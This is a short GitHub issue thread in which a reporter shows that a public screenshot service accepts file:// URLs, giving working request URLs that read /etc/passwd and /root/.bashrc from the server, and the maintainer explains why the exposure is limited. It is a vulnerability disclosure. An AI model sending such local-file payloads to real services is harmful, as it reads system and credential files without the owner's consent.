### ISSUE TITLE
Security Issue (?)

### ISSUE THREAD

**Issue by denysvitali** [as-a-service/screenshot#2]
`file:///etc/passwd`
https://screenshot.as-a-service.dev/?url=file:///etc/passwd
![](https://screenshot.as-a-service.dev/?url=file:///etc/passwd)

`file:///root/.bashrc`
https://screenshot.as-a-service.dev/?url=file:///root/.bashrc
![](https://screenshot.as-a-service.dev/?url=file:///root/.bashrc)

**Comment by steren** [comment]
The files you pint at are just the defaults from the `node` base image, there is nothing private stored in this image. The containers are destroyed regularly.

Furthermore, like all microservices on as-a-service.dev, this code is deployed to Cloud Run with an identity that has no Cloud IAM permissions, so even if an attacker manages to get an auth token, it would be useless.
